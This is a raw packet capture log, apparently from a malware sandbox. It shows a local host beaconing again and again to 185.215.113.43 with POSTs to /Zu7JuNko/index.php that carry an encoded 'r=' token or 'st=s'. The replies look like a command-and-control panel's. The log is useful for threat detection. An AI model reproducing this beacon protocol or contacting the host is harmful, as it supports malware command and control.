Dec 15, 2024 00:00:40.453087091 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:00:41.799407005 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	50191	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:43.565485954 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:00:43.977124929 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:00:45.533632040 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	50195	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:47.171345949 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:00:48.509377956 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	50197	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:50.273056030 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:00:51.603477955 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	50200	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:53.250886917 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:00:54.605786085 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	50201	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:56.356149912 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:00:57.712085009 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:00:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	50202	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:00:59.359302998 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:01:00.712637901 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	50204	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:02.463201046 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:01:03.817842007 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	50205	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:05.463300943 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:01:06.800921917 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	50206	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:08.547425985 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:01:09.878725052 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	50207	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:11.530222893 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:01:12.884605885 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	50208	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:14.650075912 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:01:16.064949036 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	50209	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:17.712544918 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:01:19.050263882 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	50210	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:20.813256025 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:01:22.161916971 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	50211	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:23.818108082 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:01:25.179877996 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	50212	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:26.938900948 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:01:28.272818089 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	50213	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:29.919703960 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:01:31.265578032 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	50214	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:33.026396036 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:01:34.358773947 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	50215	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:36.002530098 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:01:37.338855028 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	50216	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:39.081762075 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:01:40.412487030 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	50217	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:42.059425116 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:01:43.397106886 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	50218	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:45.149916887 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:01:46.480561018 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	50219	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:48.127662897 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 15, 2024 00:01:49.464790106 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	50221	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:51.236182928 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 15, 2024 00:01:52.586198092 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 23:01:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	50222	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:01:54.233302116 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
